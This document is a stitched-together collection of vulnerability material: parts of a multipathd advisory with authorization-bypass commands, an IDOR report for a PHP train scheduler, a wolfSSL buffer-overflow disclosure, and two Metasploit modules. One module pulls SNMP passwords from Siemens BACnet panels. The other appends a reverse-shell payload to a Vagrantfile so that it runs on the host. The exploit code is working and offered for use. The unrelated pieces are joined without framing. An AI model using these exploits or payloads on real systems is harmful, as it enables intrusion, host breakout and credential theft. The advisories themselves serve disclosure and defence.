uint64_t<br />322 fingerprint(const struct _vector *vec)<br />...<br />325 uint64_t fp = 0;<br />...<br />331 vector_foreach_slot(vec, kw, i)<br />332 fp += kw->code;<br />333 <br />334 return fp;<br />------------------------------------------------------------------------<br /> 89 static struct handler *<br /> 90 find_handler (uint64_t fp)<br /> ..<br /> 95 vector_foreach_slot (handlers, h, i)<br /> 96 if (h->fingerprint == fp)<br /> 97 return h;<br /> 98 <br /> 99 return NULL;<br />------------------------------------------------------------------------<br /><br />When multipathd receives a command from a client, it first performs an<br />authentication check and an authorization check (both at line 491):<br /><br />------------------------------------------------------------------------<br />431 static int client_state_machine(struct client *c, struct vectors *vecs,<br />...<br />485 case CLT_PARSE:<br />486 c->error = parse_cmd(c);<br />487 if (!c->error) {<br />...<br />491 if (!c->is_root && kw->code != LIST) {<br />492 c->error = -EPERM;<br />...<br />495 }<br />496 }<br />497 if (c->error)<br />...<br />501 else<br />502 set_client_state(c, CLT_WORK);<br />...<br />522 case CLT_WORK:<br />523 c->error = execute_handler(c, vecs);<br />------------------------------------------------------------------------<br /><br />- Authentication: if the client's UID (obtained from SO_PEERCRED) is 0<br /> (i.e., if is_root is true), then the client is privileged; otherwise,<br /> it is unprivileged.<br /><br />- Authorization: if the client is privileged, it is allowed to execute<br /> any commands; otherwise, only unprivileged LIST commands are allowed<br /> (i.e., commands whose first keyword is either "list" or "show").<br /><br />Attentive readers may have noticed that multipathd does not, in fact,<br />calculate the fingerprint of a command by bitwise-ORing its constituent<br />keywords, but by arithmetic-ADDing them (at line 332). 
While these two<br />operations are equivalent if no keyword is repeated, we (attackers) can<br />send a seemingly unprivileged command (whose first keyword is "list")<br />but whose fingerprint matches a privileged command (by repeating the<br />"list" keyword): we can exploit this flaw to bypass multipathd's<br />authorization check.<br /><br />For example, we are not allowed to execute "add path PARAM" (whose<br />fingerprint is 2+65536=65538) because the first keyword is not "list",<br />but we are allowed to execute the equivalent "list list path PARAM"<br />(whose fingerprint is also 1+1+65536=65538, instead of 1|1|65536=65537)<br />because the first keyword is "list" (the multipathd daemon below replies<br />"blacklisted" because PARAM is an invalid path, not because the command<br />is denied):<br /><br />------------------------------------------------------------------------<br />$ multipathd add path PARAM<br />permission deny: need to be root<br /><br />$ multipathd list list path PARAM<br />blacklisted<br />------------------------------------------------------------------------<br /><br />This authorization bypass greatly enlarges the attack surface of<br />multipathd: 34 privileged command handlers become available to local<br />attackers, in addition to the 23 unprivileged command handlers that are<br />normally available. We audited only a few of these command handlers,<br />because we quickly discovered a low-hanging vulnerability (a symlink<br />attack) in one of them.<br /><br /><br />========================================================================<br />CVE-2022-41973: Symlink attack<br />========================================================================<br /><br />multipathd operates insecurely, as root, in /dev/shm (a sticky,<br />world-writable directory similar to /tmp). 
The vulnerable code (in<br />mark_failed_wwid()) may be executed during the normal lifetime of<br />multipathd, but a local attacker can force its execution by exploiting<br />the authorization bypass CVE-2022-41974; for example, by adding a<br />"whitelisted, unmonitored" device to multipathd:<br /><br />------------------------------------------------------------------------<br />$ multipathd list devices | grep 'whitelisted, unmonitored'<br /> sda1 devnode whitelisted, unmonitored<br /> ...<br /><br />$ multipathd list list path sda1<br />fail<br />------------------------------------------------------------------------<br /><br />This command, which is equivalent to "add path sda1", results in the<br />following system-call trace (strace) of the multipathd daemon:<br /><br />------------------------------------------------------------------------<br />386 openat(AT_FDCWD, "/dev/shm/multipath/failed_wwids", O_RDONLY|O_DIRECTORY) = -1 ENOENT (No such file or directory)<br />387 mkdir("/dev", 0700) = -1 EEXIST (File exists)<br />388 mkdir("/dev/shm", 0700) = -1 EEXIST (File exists)<br />389 mkdir("/dev/shm/multipath", 0700) = 0<br />390 mkdir("/dev/shm/multipath/failed_wwids", 0700) = 0<br />391 openat(AT_FDCWD, "/dev/shm/multipath/failed_wwids", O_RDONLY|O_DIRECTORY) = 12<br />392 getpid() = 375<br />393 openat(12, "VBOX_HARDDISK_VB60265ca5-df119cb6.177", O_RDONLY|O_CREAT|O_EXCL, 0400) = 13<br />394 close(13) = 0<br />395 linkat(12, "VBOX_HARDDISK_VB60265ca5-df119cb6.177", 12, "VBOX_HARDDISK_VB60265ca5-df119cb6", 0) = 0<br />396 unlinkat(12, "VBOX_HARDDISK_VB60265ca5-df119cb6.177", 0) = 0<br />397 close(12) = 0<br />------------------------------------------------------------------------<br /><br />- at line 389, the directory "/dev/shm/multipath" is created, if it does<br /> not exist already;<br /><br />- at line 390, the directory "/dev/shm/multipath/failed_wwids" is<br /> created, if it does not exist already;<br /><br />- at lines 391-397, the empty file<br 
/> "/dev/shm/multipath/failed_wwids/VBOX_HARDDISK_VB60265ca5-df119cb6" is<br /> created, if it does not exist already (its name is the "World Wide ID"<br /> of the added device).<br /><br />multipathd is therefore vulnerable to two different symlink attacks:<br /><br />1/ if we (attackers) create an arbitrary symlink "/dev/shm/multipath",<br />then we can create a directory named "failed_wwids" (user root, group<br />root, mode 0700) anywhere in the filesystem;<br /><br />2/ if we create an arbitrary symlink "/dev/shm/multipath/failed_wwids",<br />then we can create a file named "VBOX_HARDDISK_VB60265ca5-df119cb6"<br />(user root, group root, mode 0400, size 0) anywhere in the filesystem.<br /><br />These two symlink attacks are very weak, because we do not control the<br />name, user, group, mode, or contents of the directory or file that we<br />create; only its location. Despite these limitations, we were able to<br />combine multipathd's vulnerabilities (authorization bypass and symlink<br />attack) with a third vulnerability (in another package), and obtained<br />full root privileges on Ubuntu Server 22.04; we will publish this third<br />vulnerability in an upcoming advisory.<br /><br />Side note: initially, we thought that the symlink attack 1/ would fail,<br />because /dev/shm is a sticky world-writable directory, and the kernel's<br />fs.protected_symlinks is 1 by default; to our great surprise, however,<br />it succeeded. Eventually, we understood that only the final component of<br />a path is protected, not its intermediate components; for example, if<br />/tmp/foo is a symlink, then an access to /tmp/foo itself is protected,<br />but an access to /tmp/foo/bar is not. 
Interestingly, this weakness was<br />already pointed out in 2017 by Solar Designer, and the original<br />Openwall, grsecurity, and Yama protections are not affected:<br /><br />https://www.openwall.com/lists/kernel-hardening/2017/06/06/74<br /><br /><br />========================================================================<br />Acknowledgments<br />========================================================================<br /><br />We thank Martin Wilck and Benjamin Marzinski for their hard work on this<br />release, and the SUSE Security Team for their help with this disclosure.<br />We also thank the members of linux-distros@openwall.<br /><br /><br />========================================================================<br />Timeline<br />========================================================================<br /><br />2022-08-24: Advisory sent to security@suse.<br /><br />2022-10-10: Advisory and patches sent to linux-distros@openwall.<br /><br />2022-10-24: Coordinated Release Date (15:00 UTC).<br /><br /></code></pre>
<pre><code># Exploit Title: Train Scheduler App v1.0 - Insecure Direct Object Reference (IDOR) to "delete user id"<br /># Exploit Author: Rohit Sharma<br /># Vendor Name: oretnom23<br /># Vendor Homepage: https://www.sourcecodester.com/php/15720/train-scheduler-app-using-php-oop-and-mysql-database-free-download.html<br /># Software Link: https://www.sourcecodester.com/php/15720/train-scheduler-app-using-php-oop-and-mysql-database-free-download.html<br /># Version: v1.0<br /># Tested on: Windows, XAMPP, Apache<br /><br /><br />Vulnerability description: Train Scheduler App suffers from an Insecure Direct Object Reference (IDOR) vulnerability.<br /><br /><br /><br />Vulnerable parameters:<br />action, id<br /><br />How to reproduce this vulnerability:<br />1. Host the web application on localhost.<br />2. Go to this URL: http://127.0.0.1/train_scheduler_app/<br />3. Add some entries to generate a schedule list (the author created many entries when testing this application).<br />4. Go to this URL: http://127.0.0.1/train_scheduler_app/?action=delete&id=5<br />5. The id parameter is vulnerable to IDOR: changing it to other values (5, 6, 7, 8, etc.) deletes other users' schedule entries, because the delete action does not check that the entry belongs to the requesting user.<br /><br /><br /><br /></code></pre>
<pre><code># wolfssl before 5.5.1: CVE-2022-39173 Buffer overflow when refining<br />cipher suites<br />==================================================================================<br /><br /><br />## INFO<br />=======<br /><br />The CVE project has assigned the id CVE-2022-39173 to this issue.<br /><br />Severity: high 7.5<br />Affected version: before 5.5.1<br />End of embargo: The embargo for this vulnerability ended 29th of September, 2022<br /><br /><br />## SUMMARY<br />==========<br /><br />In wolfSSL before 5.5.1 malicious clients can cause a buffer-overflow<br />during a resumed TLS 1.3 handshake. If an attacker resumes a previous<br />TLS session by sending a maliciously crafted Client Hello, followed by<br />another maliciously crafted Client Hello. In total 2 Client Hellos<br />have to be sent. One which pretends to resume a previous session and a<br />second one as a response to a Hello Retry Request message.<br /><br />The malicious Client Hellos contain a list of supported cipher suites,<br />which contain at least `⌊sqrt(150)⌋ + 1 = 13` duplicates and less than<br />150 ciphers in total. The buffer-overflow occurs in the `RefineSuites`<br />function. An overflow of 44700 bytes has been confirmed. Therefore,<br />large portions of the stack can get overwritten, including return<br />addresses.<br /><br />We confirmed the vulnerability by sending packets over TCP to a<br />Wolfssl server, freshly built from the sources with the<br />`--enable-session-ticket` flags (or simply `--enable-all`). We can<br />provide sources for our software (tlspuffin) that produce those<br />packets (and that automatically found the attack trace). The command<br />given at the end of this document triggers the buffer overflow.<br /><br />It is very likely that there is a way to craft an exploit which can<br />cause a RCE. 
We have not yet created such an exploit as it would<br />likely depend on the memory layout of the binary which uses wolfSSL.<br /><br />Moreover, the size of the overflow can be fine-tuned in order to not<br />smash the stack and continue the execution with a too large length of<br />suites buffer and that will cause other routines that iterate over<br />thus buffer (e.g., `FindSuiteSSL`) to misbehave. Hypothetically, this<br />might be exploited to make the server use a cipher it should not<br />accept such as `nullcipher` that would open up new attack vectors such<br />as downgrade attacks.<br />While this has not been confirmed yet, the buffer overflow itself has<br />been confirmed.<br /><br /><br />## DETAILS<br />==========<br /><br />Line numbers below are valid for the wolfSSL Git tag<br />[v5.4.0-stable](https://github.com/wolfSSL/wolfssl/tree/v5.4.0-stable).<br /><br />The bug we found is in the `RefineSuites` function. In the following<br />we want to explain why the function is able to overflow the `suites`<br />array.<br />```c<br />/* Refine list of supported cipher suites to those common to server and client.<br /> *<br /> * ssl SSL/TLS object.<br /> * peerSuites The peer's advertised list of supported cipher suites.<br /> */<br />static void RefineSuites(WOLFSSL* ssl, Suites* peerSuites)<br />{<br /> byte suites[WOLFSSL_MAX_SUITE_SZ];<br /> word16 suiteSz = 0;<br /> word16 i, j;<br /><br /> XMEMSET(suites, 0, WOLFSSL_MAX_SUITE_SZ);<br /><br /> for (i = 0; i < ssl->suites->suiteSz; i += 2) {<br /> for (j = 0; j < peerSuites->suiteSz; j += 2) {<br /> if (ssl->suites->suites[i+0] == peerSuites->suites[j+0] &&<br /> ssl->suites->suites[i+1] == peerSuites->suites[j+1]) {<br /> suites[suiteSz++] = peerSuites->suites[j+0];<br /> suites[suiteSz++] = peerSuites->suites[j+1];<br /> }<br /> }<br /> }<br /><br /> ssl->suites->suiteSz = suiteSz;<br /> XMEMCPY(ssl->suites->suites, &suites, sizeof(suites));<br />#ifdef WOLFSSL_DEBUG_TLS<br /> [...]<br />#endif<br 
/>}<br />```<br />tls13.c:4355<br /><br />The `RefineSuites` function expects a `WOLFSSL` struct which contains<br />a list of acceptable ciphers suites (`ssl->suites->suites`), as well<br />as an array of peer cipher suites (`peerSuites`). Both inputs are<br />bounded by `WOLFSSL_MAX_SUITE_SZ`, which is equal to 300 bytes or 150<br />cipher suites.<br /><br />Let us assume that `ssl->suites` consists of a single cipher suite<br />like `TLS_AES_256_GCM_SHA384` and the `peerSuites` list contains the<br />same cipher repeated thirteen times. The `RefineSuites` function will<br />iterate for each element in `ssl->suites` over `peerSuites` and append<br />the suite to `suites` if it is a match. The `suites` array has a<br />maximum length of `WOLFSSL_MAX_SUITE_SZ == 300 bytes == 150 suites`.<br /><br />With the just mentioned example input, the length of `suites` will now<br />equal thirteen. The `suites` array is now copied to the `WOLFSSL`<br />struct in the last line of the listing above. Therefore, `ssl->suites`<br />contains now thirteen times the `TLS_AES_256_GCM_SHA384` cipher suite.<br /><br />Let us now call the same `RefineSuites` function again on the modified<br />`WOLFSSL` struct and the same `peerSuites` list. The `RefineSuites`<br />function will iterate for each element in `ssl->suites` over<br />`peerSuites` and append the suite to `suites` if it is a match.<br />Because `ssl->suites` contains already 13 times the<br />`TLS_AES_256_GCM_SHA384` cipher suite, in total 13 x 13 = 169 cipher<br />suites are written to `suites`. 169 cipher suites require 338 bytes,<br />which is more than what's available on the stack. The `suites` buffer<br />overflows.<br /><br />The maximum size of `peerSuites` is 150 cipher suites. 
Therefore, an<br />overflow of 44700 bytes is possible and has been confirmed.<br /><br />The buffer `ssl->suites->suites` is supposed to be reset to only<br />contain the acceptable ciphers at each session start, and thus<br />initially contains no duplicate. However, by provoking a `HELLO CLIENT<br />RETRY REQUEST`, it is possible to make the server call `RefineSuites`<br />twice as explained next.<br /><br /><br />## TRIGGERING THE BUFFER OVERFLOW<br />=================================<br /><br />In order to cause the above buffer-overflow, it is required to call<br />`RefineSuites` twice. Malicious clients need to perform the handshake<br />in a certain way to reach this situation.<br />The buffer overflow at the attacked server can be obtained at least in<br />the following situation:<br /><br />1. Resume the previous session by sending a second Client Hello<br />(`CH2`) with the following criteria:<br /> - Exclude the `support_group_extension`, to cause a Hello Retry Request<br /> - Include a binder which cryptographically binds this session to<br />the previous one.<br /> - Include a list of cipher suites that contains a repetition of `n`<br />times the same cipher `c` with `13 <= n < 150`, deemed acceptable by<br />the server.<br /><br /> The server will parse this message, enters the state<br />`SERVER_HELLO_RETRY_REQUEST_COMPLETE` and stores at least `n` times<br />the cipher `c` in `ssl->suites->suites` by calling `RefineSuites`.<br /><br />2. 
Sending a third Client Hello (`CH3`) with the same criteria as in step 1.<br /> The server will parse this message and because<br />`ssl->suites->suites` already contains `n` times the cipher `c`,<br />`RefineSuites` will write in `suites` at least until `suites[n^2]`<br />which overflows since `n^2 > 300`.<br /><br /><br />## DETAILS ABOUT STEP 1.<br />========================<br /><br />During step 1., we want to cause the server to perform a Hello Retry Request.<br /><br />This is possible by not sending a supported group in the `CH2`. By not<br />sending a supported group extension, the function<br />`TLSX_SupportedGroups_Find` will return false.<br /><br />```c<br />static int TLSX_SupportedGroups_Find(WOLFSSL* ssl, word16 name)<br />{<br /> ...<br /> /* Check consistency now - extensions in any order. */<br /> if (!TLSX_SupportedGroups_Find(ssl, clientKSE->group))<br /> continue;<br /> ...<br />```<br />tls.c:8374<br /><br />This will cause clientKSE to be `NULL` and `doHelloRetry` will be set to 1.<br /><br />```c<br />int TLSX_KeyShare_Establish(WOLFSSL *ssl, int* doHelloRetry)<br />{<br /> ...<br /> /* No supported group found - send HelloRetryRequest. */<br /> if (clientKSE == NULL) {<br /> /* Set KEY_SHARE_ERROR to indicate HelloRetryRequest required. 
*/<br /> *doHelloRetry = 1;<br /> return TLSX_KeyShare_SetSupported(ssl);<br /> }<br /> ...<br />```<br />tls.c:9273<br /><br />Finally, the server enters the state<br />`SERVER_HELLO_RETRY_REQUEST_COMPLETE` in the function<br />`VerifyServerSuite` while verifying the server suite when processing<br />`CH2`.<br /><br />```c<br /> /* Make sure server cert/key are valid for this suite, true on success<br /> * Returns 1 for valid server suite or 0 if not found<br /> * For asynchronous this can return WC_PENDING_E<br /> */<br /> static int VerifyServerSuite(WOLFSSL* ssl, word16 idx)<br /> {<br /> ...<br /> if (IsAtLeastTLSv1_3(ssl->version) &&<br /> ssl->options.side == WOLFSSL_SERVER_END) {<br /> int doHelloRetry = 0;<br /> /* Try to establish a key share. */<br /> int ret = TLSX_KeyShare_Establish(ssl, &doHelloRetry);<br /> if (doHelloRetry) {<br /> ssl->options.serverState = SERVER_HELLO_RETRY_REQUEST_COMPLETE;<br /> }<br /><br /> ...<br /> }<br /> ...<br />```<br />tls.c:30688<br /><br /><br />## DETAILS ABOUT STEP 2.<br />====================<br /><br />The server is now in a state in which it expects another Client Hello<br />(`CH3`) from the client.<br /><br />The server is now in the state `SERVER_HELLO_RETRY_REQUEST_COMPLETE`<br />and will process the third ClientHello (`CH3`) with the call of<br />`ProcessReply` before reaching the `TLS13_ACCEPT_SECOND_REPLY_DONE`<br />state.<br /><br />```c<br />int wolfSSL_accept_TLSv13(WOLFSSL* ssl)<br />{<br /> ...<br /> case TLS13_ACCEPT_FIRST_REPLY_DONE :<br /> if (ssl->options.serverState ==<br /> SERVER_HELLO_RETRY_REQUEST_COMPLETE) {<br /> ssl->options.clientState = CLIENT_HELLO_RETRY;<br /> while (ssl->options.clientState < CLIENT_HELLO_COMPLETE) {<br /> if ((ssl->error = ProcessReply(ssl)) < 0) {<br /> WOLFSSL_ERROR(ssl->error);<br /> return WOLFSSL_FATAL_ERROR;<br /> }<br /> }<br /> }<br /><br /> ssl->options.acceptState = TLS13_ACCEPT_SECOND_REPLY_DONE;<br /> WOLFSSL_MSG("accept state 
ACCEPT_SECOND_REPLY_DONE");<br /> FALL_THROUGH;<br /> ...<br />```<br />tls13.c:10909<br /><br />## VULNERABILITY VARIANTS<br />=========================<br /><br />### Adjusting the overflow<br />Note that the length of the list of ciphers in `CH2` does not<br />necessarily have to be the same as the one of `CH1` and can be<br />adjusted to fine-tune the size of the overflow.<br /><br />### Make the server parse `CH2`<br />Note also that, unlike `CH1`, `CH2` does not necessarily<br />have to put the server in the `SERVER_HELLO_RETRY_REQUEST_COMPLETE`<br />state (which should be forbidden by the TLS 1.3 RFC) or make it return<br />an error, and can thus contain a supported group, which could be<br />included to possibly make the server continue the processing of `CH2`<br />without returning an error.<br />We have confirmed that we can make the server parse `CH2` until the<br />end and start computing a Server Hello with `ssl->suites->suiteSz`<br />that exceeds 300.<br /><br />### Resuming an existing session<br />It is also possible to trigger the vulnerability by trying to resume<br />an existing, genuine session established through a full initial<br />handshake (step 0.):<br />0. Sending an initial genuine Client Hello (`CH1`) to the server and<br />then completing a full handshake, thus establishing a PSK.<br /><br /><br />## EXPLOITATION<br />===============<br /><br />We suspect that it is possible to craft an exploit which could lead to<br />RCE if any of the above bytes coincides with the memory address of<br />executable code. 
Depending on the memory layout of the binary it could<br />be possible to gain RCE.<br />More bytes could be used to overflow `suites` if more ciphers were<br />configured to be accepted by the server, e.g., with options like<br />`--enable-blake2`.<br /><br />We confirmed that this could also be exploited to smash the stack and<br />cause the server to crash with a segmentation fault by using a large<br />list of ciphers.<br /><br />Finally, by fine-tuning the length of the overflow and by including<br />the supported group in `CH3`, it could be possible to make the server<br />process `CH3` with a `ssl->suites->suiteSz` value that exceeds<br />300. This way, routines like `FindSuiteSSL` that will iterate over<br />`ssl->suites->suites` (a 300-byte buffer) until<br />`ssl->suites->suiteSz` (>300) will also iterate over bytes that<br />contain other fields such as `ssl->suites->hashSigAlgo`. It is likely<br />that this could be exploited to make such routines return arbitrary<br />values. For example, it might be exploited to make the server use a<br />cipher it should not accept such as `nullcipher`; thus breaking<br />confidentiality.<br /><br />## FURTHER CONCERNS<br />==================<br /><br />We observed that the server accepts the `CH2` Client Hello<br />message and issues a Hello Retry Request, even though `CH2` does not<br />contain supported groups. Clients are not allowed to add the supported<br />groups extension in the retry Client Hello (`CH3`) according to<br />RFC 8446, section<br />[4.1.2](https://www.rfc-editor.org/rfc/rfc8446#section-4.1.2). The<br />addition of supported groups is not allowed when retrying the Client<br />Hello.<br />We suggest aborting the handshake when receiving `CH2` instead of<br />offering the client a retry.<br /><br /></code></pre>
#!/usr/bin/env python3

# -*- coding: utf-8 -*-
# 2022-05-23

# Standard Modules
from metasploit import module

# Extra Dependencies
# NOTE(review): `requests` is imported three times in this block; the duplicates
# are harmless but should be collapsed. `xmltodict` is imported but never used
# below, yet an absent xmltodict install still disables the whole module via
# the ImportError path.
dependencies_missing = False
try:
    import logging
    import requests
    import requests
    import xmltodict
    import xml.etree.ElementTree as ET
    import socket
    import struct
    import requests
except ImportError:
    dependencies_missing = True


# Metasploit Metadata
# NOTE(review): the 'cve' reference is given as a URL rather than a bare
# identifier; confirm this matches the external-module reference format.
metadata = {
    'name': 'Siemens BACnet Field Panel Path Traversal',
    'description': '''
        This module exploits a hidden directory on Siemens APOGEE PXC BACnet Automation Controllers (all versions prior to V3.5), and TALON TC BACnet Automation Controllers (all versions prior to V3.5). With a 7.5 CVSS, this exploit allows for an attacker to perform an authentication bypass using an alternate path or channel to enumerate hidden directories in the web server.
    ''',
    'authors': [
        'RoseSecurity',
    ],
    'date': '2022-05-23',
    'license': 'MSF_LICENSE',
    'references': [
        {'type': 'url', 'ref': 'https://sid.siemens.com/v/u/A6V10304985'},
        {'type': 'cve', 'ref': 'https://nvd.nist.gov/vuln/detail/CVE-2017-9946'},
    ],
    'type': 'single_scanner',
    'options': {
        'rhost': {'type': 'string', 'description': 'Target address', 'required': True, 'default': None},
    }
}


def run(args: dict) -> None:
    """Fetch the panel's FieldPanel.xml over HTTP and log the values it exposes.

    Args:
        args: Metasploit option values; only ``args['rhost']`` is read.

    Returns:
        None. Findings are written to the module log. A failed HTTP request is
        logged and the function returns early; other errors (see notes below)
        propagate to the caller.
    """
    module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))
    if dependencies_missing:
        logging.error('Module dependency (requests) is missing, cannot continue')
        return

    try:
        # Download Hidden XML File
        # NOTE(review): the format string already has a '/' before '{}' and the
        # argument starts with '/', so the request path becomes
        # '//FieldPanel.xml' (double slash); confirm this is intended.
        # verify=False is a no-op for a plain http:// URL but would silently
        # disable certificate validation if the scheme were changed to https.
        r = requests.get('http://{}/{}'.format(args['rhost'], '/FieldPanel.xml'), verify=False)

        # Convert to Readable Format
        # r.content is untrusted remote data. ET.ParseError raised here is not
        # covered by the RequestException handler below and will propagate.
        # NOTE(review): consider a hardened parser (e.g. defusedxml) for
        # untrusted XML — not verified to be an issue for this input.
        xml_doc = r.content
        root = ET.fromstring(xml_doc)

        # Parse XML for Sensitive Data
        # Values are read by child position (root[N]). A shorter document raises
        # IndexError and an empty element (text is None) raises TypeError on the
        # string concatenation; neither is caught below. The positions are
        # presumably tied to the firmware versions named in the metadata —
        # unverified here.
        module.log("Remote Site ID: " + root[18].text)
        module.log("Building Level Network Name: " + root[26].text)
        module.log("Site Name: " + root[27].text)
        module.log("Hostname: " + root[28].text)
        # The address fields are hex strings; int(..., 16) raises ValueError on
        # malformed text, and struct.pack(">L") raises struct.error if the value
        # does not fit in 32 bits. Neither is caught below.
        ip_addr = int(root[30].text, 16)
        module.log("IP Address: " + socket.inet_ntoa(struct.pack(">L", ip_addr)))
        gw_addr = int(root[32].text, 16)
        gw_addr = str(socket.inet_ntoa(struct.pack(">L", gw_addr)))
        # NOTE(review): [::-1] reverses the dotted-quad *string* character by
        # character (constructed example: '10.0.0.1' -> '1.0.0.01'), not the
        # byte order. The IP address above is not reversed, so this looks like
        # a bug; confirm against a real response before changing it.
        module.log("Gateway IP Address: " + gw_addr[::-1])
        module.log("Maximum Transmission Size: " + root[57].text)
        module.log("BACnet Device Name: " + root[60].text)
        module.log("BACnet UDP Port: " + root[62].text)
        module.log("Device Location: " + root[63].text)
        module.log("Device Description: " + root[64].text)
        module.log("Device Barcode: " + root[88].text)
        module.log("Device Revision String: " + root[104].text)
        module.log("Device Firmware: " + root[105].text)
        module.log("Panel Key Name: " + root[109].text)
        # The three SNMP entries are credentials disclosed by the device; the
        # remediation is the vendor fix referenced in metadata['references'].
        # They land in the module log in clear text, so treat that log as
        # sensitive.
        module.log("SNMP Username: " + root[148].text)
        module.log("SNMP Private Password: " + root[149].text)
        module.log("SNMP Authorization Password: " + root[150].text)

        # Determine Running Services
        # int() on non-numeric text raises ValueError, which is not caught below.
        if int(root[48].text) == 1:
            module.log("Telnet Enabled")
        else:
            module.log("Telnet Disabled")

        if int(root[84].text) == 1:
            module.log("Wireless Enabled")
        else:
            module.log("Wireless Disabled")

        if int(root[103].text) == 3:
            module.log("Webserver Enabled")
        else:
            module.log("Webserver Disabled")

    # Only transport-level failures are handled; see the notes above for the
    # parsing and conversion errors that escape this handler.
    except requests.exceptions.RequestException as e:
        logging.error('{}'.format(e))
        return


if __name__ == '__main__':
    module.run(metadata, run)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  prepend Msf::Exploit::Remote::AutoCheck

  # Default Vagrant synced folders (aka shared folders) as mounted on the guest.
  DEFAULT_SHARED_DIRECTORIES = [
    'C:\\vagrant\\',
    '/vagrant/'
  ].freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Vagrant Synced Folder Vagrantfile Breakout',
        'Description' => %q{
          This module exploits a default Vagrant synced folder (shared folder)
          to append a Ruby payload to the Vagrant project Vagrantfile config file.

          By default, unless a Vagrant project explicitly disables shared folders,
          Vagrant mounts the project directory on the host as a writable 'vagrant'
          directory on the guest virtual machine. This directory includes the
          project Vagrantfile configuration file.

          Ruby code within the Vagrantfile is loaded and executed when a user
          runs any vagrant command from the project directory on the host,
          leading to execution of Ruby code on the host.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'HashiCorp', # Vagrant defaults
          'bcoles' # Metasploit
        ],
        'DisclosureDate' => '2011-01-19', # Vagrant 0.7.0 release date - first mention of shared folders in CHANGELOG
        'Platform' => %w[ruby],
        'Arch' => ARCH_ALL,
        'SessionTypes' => [ 'shell', 'powershell', 'meterpreter' ],
        'Stance' => Msf::Exploit::Stance::Passive,
        'DefaultOptions' => {
          'DisablePayloadHandler' => true
        },
        'Targets' => [
          [
            'Ruby Code',
            {
              'Platform' => 'ruby',
              'Arch' => ARCH_RUBY,
              'Type' => :ruby,
              'DefaultOptions' => {
                'PAYLOAD' => 'ruby/shell_reverse_tcp'
              }
            }
          ],
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'Payload' => { 'BadChars' => '`' },
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_bash'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'References' => [
          ['URL', 'https://www.vagrantup.com/docs/synced-folders'],
          ['URL', 'https://www.virtualbox.org/manual/ch04.html#sharedfolders']
        ],
        'Notes' => {
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ]
        }
      )
    )
    register_options([
      OptString.new('VAGRANTFILE_PATH', [false, 'Path to Vagrantfile (leave blank to auto detect)', ''])
    ])
  end

  # Locate the project Vagrantfile reachable from the guest.
  #
  # When VAGRANTFILE_PATH is set it is used as-is, provided it exists.
  # Otherwise each default shared directory is listed and the first entry
  # whose name is 'vagrantfile' (compared case-insensitively) wins.
  #
  # @return [String, nil] path of the Vagrantfile, or nil when none was found
  def find_vagrantfile_path
    configured = datastore['VAGRANTFILE_PATH']
    return (exists?(configured) ? configured : nil) unless configured.blank?

    DEFAULT_SHARED_DIRECTORIES.each do |dir_path|
      entries = shared_dir_entries(dir_path)
      next if entries.empty?

      # Vagrant project configuration file name is case-insensitive (typically "Vagrantfile")
      match = entries.find { |fname| fname.downcase == 'vagrantfile' }
      return "#{dir_path}#{match}" if match
    end

    nil
  end

  # Vagrantfile path, looked up once and cached (see #find_vagrantfile_path).
  # A nil result is not cached, so a later call searches again.
  #
  # @return [String, nil]
  def vagrantfile
    @vagrantfile = @vagrantfile || find_vagrantfile_path
  end

  # Report whether a writable Vagrantfile was found.
  #
  # @return [Msf::Exploit::CheckCode] Safe when no Vagrantfile exists,
  #   Detected when it exists but is (or may be) read-only, Appears otherwise
  def check
    path = vagrantfile
    return CheckCode::Safe('Vagrantfile not found.') unless path

    # `writable?' method does not support Windows systems
    writable = begin
      writable?(path)
    rescue RuntimeError
      return CheckCode::Detected("Could not verify if #{path} is writable.")
    end

    return CheckCode::Detected("#{path} is not writable.") unless writable

    CheckCode::Appears("#{path} is writable!")
  end

  # Append the selected payload to the Vagrantfile.
  #
  # The file is modified in place and is not cleaned up by this module
  # (see the warning printed at the end).
  #
  # @raise [Msf::Exploit::Failed] via fail_with when no Vagrantfile is found,
  #   no target is selected, or the append fails
  def exploit
    path = vagrantfile
    fail_with(Failure::NotVulnerable, 'Could not find Vagrantfile') unless path

    data =
      case target['Type']
      when :ruby then payload.encoded
      when :unix_cmd then "`#{payload.encoded}`"
      else fail_with(Failure::NoTarget, 'No target selected')
      end

    print_status("Appending payload (#{data.length} bytes) to #{path} ...")

    fail_with(Failure::Unknown, "Could not write to #{path}") unless append_file(path, "\n#{data}\n")

    print_status("Payload appended to #{path}")
    print_status('The payload will be executed when a user runs any vagrant command from within the project directory on the host system.')
    print_warning("This module requires manual removal of the payload from the project Vagrantfile: #{path}")
  end

  private

  # List a candidate shared directory, treating a Meterpreter request error
  # (for example, the directory does not exist) as an empty listing so the
  # caller simply moves on to the next candidate.
  #
  # @param dir_path [String] directory to list
  # @return [Array<String>] entries returned by dir, or [] on a request error
  def shared_dir_entries(dir_path)
    dir(dir_path)
  rescue Rex::Post::Meterpreter::RequestError
    []
  end
end